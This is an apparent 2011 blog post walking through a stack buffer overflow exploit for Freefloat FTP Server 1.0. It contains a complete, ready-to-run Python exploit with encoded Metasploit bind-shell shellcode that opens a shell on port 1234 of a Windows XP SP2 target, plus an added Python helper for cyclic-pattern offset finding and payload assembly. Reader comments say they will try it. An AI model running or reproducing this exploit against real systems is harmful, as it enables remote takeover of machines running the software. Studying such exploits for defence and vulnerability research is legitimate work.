First of all I fired the Metasploit FTP fuzzer against this FTP server. The fuzzer worked like butter: at around 250 bytes of junk the program crashed. I then replaced the junk with a Metasploit cyclic pattern, confirmed that EIP had been overwritten with part of the pattern, and used the value in EIP to look up the exact offset (251 bytes, which is what the exploit uses).
I started writing the exploit. As always, Python is my first choice for writing exploits, so the exploit code is in Python.
The shellcode attached to the exploit is windows/shell/bind_tcp, generated with the Metasploit Framework; it spawns a bind shell on port 1234.
The bad characters (\x00, \x0a and \x0d) are removed from the shellcode using a Metasploit encoder.
Note that the return address the exploit overwrites EIP with (0x77F5801C) was taken from the Windows XP SP2 box it was tested on; on another Windows version or service pack it must be replaced with an address that transfers control into the NOP sled that follows it.
I have published this exploit at Packet Storm Security and Inj3ct0r (1337day).
You can find the exploit code at:
http://packetstormsecurity.org/files/author/9123/
http://1337day.com/exploits/16737
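The offset-finding step above (send a Metasploit cyclic pattern instead of plain junk, read EIP at the crash, map it back to an offset) and the buffer layout the exploit uses (padding, return address, NOP sled, shellcode) as an added Python 3 example. This is an illustration written for this page, not code from the original post or from Metasploit. The pattern generator reproduces the Aa0Aa1... scheme of pattern_create.rb; the offset 251, the return address 0x77F5801C and the bad characters \x00, \x0a, \x0d are taken from the exploit; the sample EIP value and the four-byte int3 placeholder shellcode are constructed for the demo.

```python
"""Added example (not part of the original post): Metasploit-style
pattern_create / pattern_offset in Python 3, plus a builder for the
padding + EIP + NOP sled + shellcode layout with a bad-character check."""
import string
import struct

BAD_CHARS = b"\x00\x0a\x0d"          # the bad characters named in the post


def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern Aa0Aa1Aa2...Zz9 (unique for up to 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Return the offset of the 4 pattern bytes that landed in EIP.

    eip_value is the register value as the debugger shows it (e.g. 0x34694133).
    On x86 the bytes sit in memory little-endian, so pack with '<L' before
    searching. Returns -1 if EIP was not overwritten by the pattern at all."""
    needle = struct.pack("<L", eip_value)
    return pattern.find(needle)


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list:
    """List the bad-character values present in data, ascending."""
    return sorted({b for b in data if b in bad})


def build_buffer(offset: int, ret_addr: int, shellcode: bytes,
                 nop_len: int = 20, bad: bytes = BAD_CHARS) -> bytes:
    """Assemble padding + return address + NOP sled + shellcode.

    The bad-character check covers the packed return address too: a bad byte
    there would cut the FTP command short before EIP is even reached."""
    payload = (b"A" * offset
               + struct.pack("<L", ret_addr)   # overwrites the saved return address
               + b"\x90" * nop_len             # NOP sled the redirected EIP lands in
               + shellcode)
    found = find_bad_chars(payload, bad)
    if found:
        raise ValueError("bad characters in payload: %s"
                         % ["0x%02x" % b for b in found])
    return payload


if __name__ == "__main__":
    # Step 1: send pattern_create(300) instead of "A" * 300 and read EIP at the crash.
    pat = pattern_create(300)
    # Constructed value: what EIP shows if the saved return address sits at offset 251.
    crashed_eip = struct.unpack("<L", pat[251:255])[0]
    off = pattern_offset(pat, crashed_eip)
    print("EIP = 0x%08x -> offset %d" % (crashed_eip, off))
    # Step 2: assemble the exploit buffer with a placeholder shellcode (int3 x 4, constructed).
    # 0x77F5801C is the return address the post's exploit uses for Windows XP SP2.
    buf = build_buffer(off, 0x77F5801C, b"\xcc" * 4)
    print("payload length %d, bytes at EIP: %s" % (len(buf), buf[off:off + 4].hex()))
```

Run it directly to see the offset resolved from the constructed EIP value and the payload assembled. pattern_offset returns -1 when EIP holds something that is not part of the pattern, which is the signal that the crash is not a straight return-address overwrite; build_buffer refuses a return address or shellcode containing a bad byte, since \x0a and \x0d end the FTP command line and \x00 typically terminates the string copy that overflows the buffer.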
#!/usr/bin/python
# Exploit Title: Free Float FTP server Response stack Buffer Overflow Exploit
# Date: 21-08-2011
# Author: Debasish Mandal http://www.facebook.com/raza.whitehat
# Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php
# Version: 1.0
# Category: Remote
# Tested on: Windows XP SP2.

import socket, sys
from struct import pack

# Buffer layout: 251 bytes of padding up to the saved return address, the
# return address itself, a 20-byte NOP sled, the shellcode and 5 trailing bytes.
buff = "A" * 251
junk = "A" * 5
nop = "\x90" * 20
eip = pack('<L', 0x77F5801C)   # return address; valid for the Windows XP SP2 target above

# Shellcode generated by the Metasploit Framework.
# Payload: windows/shell/bind_tcp, local port 1234.
# Bad characters excluded by the encoder: "\x00", "\x0a" and "\x0d".
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
             "\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41"
             "\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1"
             "\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77"
             "\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88"
             "\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2"
             "\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee"
             "\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5"
             "\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0"
             "\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9"
             "\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62"
             "\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3"
             "\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a"
             "\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3"
             "\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9"
             "\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88"
             "\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec"
             "\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f"
             "\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4"
             "\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10"
             "\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c"
             "\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a")

buff += eip
buff += nop
buff += shellcode
buff += junk

HOST = raw_input("Enter the target host : ")
PORT = raw_input("Enter the target port (Default 21): ") or "21"
print "[*] Connecting to the host " + HOST + " on port " + PORT
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((HOST, int(PORT)))
    print "[*] Connected to target FTP Server!"
except socket.error:
    print "[*] FTP Server didn't respond\n"
    sys.exit(0)
data = s.recv(1024)            # read the FTP banner before sending the payload
print "[*] Sending PAYLOAD to the target server"
s.send(buff + '\r\n')
s.close()
print "[*] Exploit Completed..."
print "[*] Now telnet to the server on port 1234"
# 1337day.com [2011-08-21]
Good one...bro :) I liked it.
Will surely give it a try.
Thanks for sharing... :)
thanks man...